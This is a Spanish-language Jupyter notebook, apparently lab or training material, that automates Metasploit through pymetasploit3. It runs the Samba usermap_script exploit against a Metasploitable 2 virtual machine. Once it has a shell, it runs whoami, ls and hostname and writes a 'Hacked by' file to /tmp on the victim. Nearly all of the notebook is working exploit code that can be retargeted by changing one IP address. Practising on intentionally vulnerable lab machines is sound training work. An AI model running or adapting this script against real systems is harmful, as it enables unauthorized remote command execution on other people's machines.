In [ ]:
import time
from pymetasploit3.msfrpc import MsfRpcClient, MsfRpcError


In [ ]:
def connect_to_metasploit(password: str, server: str = '127.0.0.1', port: int = 55552) -> MsfRpcClient:
    """
    Conecta con el servicio de Metasploit RPC utilizando pymetasploit3.

    Args:
        password (str): Contraseña utilizada en msfrpcd.
        server (str): Dirección IP donde corre msfrpcd. Por defecto, '127.0.0.1'.
        port (int): Puerto donde escucha msfrpcd. Por defecto, 55552.

    Returns:
        MsfRpcClient: Instancia conectada del cliente RPC de Metasploit.
    """
    try:
        client = MsfRpcClient(password=password, server=server, port=port)
        print("Conexión exitosa a Metasploit.")
        return client
    except (ConnectionError, TimeoutError) as e:
        print(f"Error de conexión: {e}")
        return None
    except (MsfRpcError, ValueError) as e:
        print(f"Error específico de Metasploit RPC: {e}")
        return None


In [ ]:
def run_samba_exploit(client: MsfRpcClient, rhost: str) -> None:
    """
    Ejecuta el exploit 'linux/samba/usermap_script' contra la máquina Metasploitable 2.

    Args:
        client (MsfRpcClient): Instancia conectada del cliente RPC de Metasploit.
        rhost (str): Dirección IP de la máquina víctima (Metasploitable 2).
    """
    try:
        # 1. Configurar el exploit
        exploit = client.modules.use('exploit', 'linux/samba/usermap_script')
        exploit['RHOSTS'] = rhost
        exploit['RPORT'] = 139   # Puerto SMB típico. También se puede usar 445 en algunos casos.

        print(f"[+] Exploit configurado para RHOSTS={rhost}, RPORT=139")

        # 2. Configurar el payload
        #    Para demostrar la interacción, usaremos un payload de tipo "cmd/unix/interact".
        payload = client.modules.use('payload', 'cmd/unix/interact')
        print("[+] Payload configurado: cmd/unix/interact")

        # 3. Ejecutar el exploit
        print("[+] Ejecutando el exploit...")
        exploit.execute(payload=payload)

        # 4. Esperar un tiempo para que la sesión se inicie
        time.sleep(10)

        # 5. Verificar si hay sesiones activas
        sessions = client.sessions.list
        if sessions:
            print("[+] Explotación exitosa. Sesiones activas detectadas:")
            for session_id, session_info in sessions.items():
                print(f"    - Session ID: {session_id}, Info: {session_info}")

                # 6. Interactuar con la sesión (ejecutar algunos comandos)
                session = client.sessions.session(session_id)

                # Comando: ¿Quién soy?
                session.write('whoami')
                time.sleep(1)
                whoami_output = session.read()
                print(f"\n[+] whoami:\n{whoami_output}")

                # Comando: Listar archivos en la carpeta actual
                session.write('ls')
                time.sleep(1)
                ls_output = session.read()
                print(f"[+] Archivos en el directorio actual:\n{ls_output}")

                # Comando: Mostrar el hostname
                session.write('hostname')
                time.sleep(1)
                hostname_output = session.read()
                print(f"[+] Nombre de la máquina:\n{hostname_output}")

                # Comando: Crear un archivo
                session.write('echo "Hacked by pymetasploit3" > /tmp/hacked_samba.txt')
                time.sleep(1)
                create_file_output = session.read()
                if create_file_output:
                    print(f"[+] Salida:\n{create_file_output}")
                print('[+] Archivo "/tmp/hacked_samba.txt" creado en la máquina víctima.')
        else:
            print("[-] No se ha podido abrir ninguna sesión. El exploit podría haber fallado.")
    except (ConnectionError, TimeoutError) as e:
        print(f"Error de conexión o timeout durante el exploit: {e}")
    except (MsfRpcError, ValueError) as e:
        print(f"Error específico de Metasploit al ejecutar el exploit: {e}")


In [ ]:
def main():
    """
    Función principal que:
      1) Conecta con Metasploit.
      2) Ejecuta el exploit de Samba contra Metasploitable 2.
    """
    # 1. Conectar con Metasploit
    client = connect_to_metasploit('password')  # Ajusta la contraseña según la configuración de msfrpcd

    # 2. En caso de conexión exitosa, ejecutar el exploit
    if client:
        target_ip = '192.168.0.110'  # Ajusta la IP según la de tu Metasploitable 2
        run_samba_exploit(client, target_ip)
    else:
        print("No se puede proceder sin una conexión exitosa a Metasploit.")


In [ ]:
main()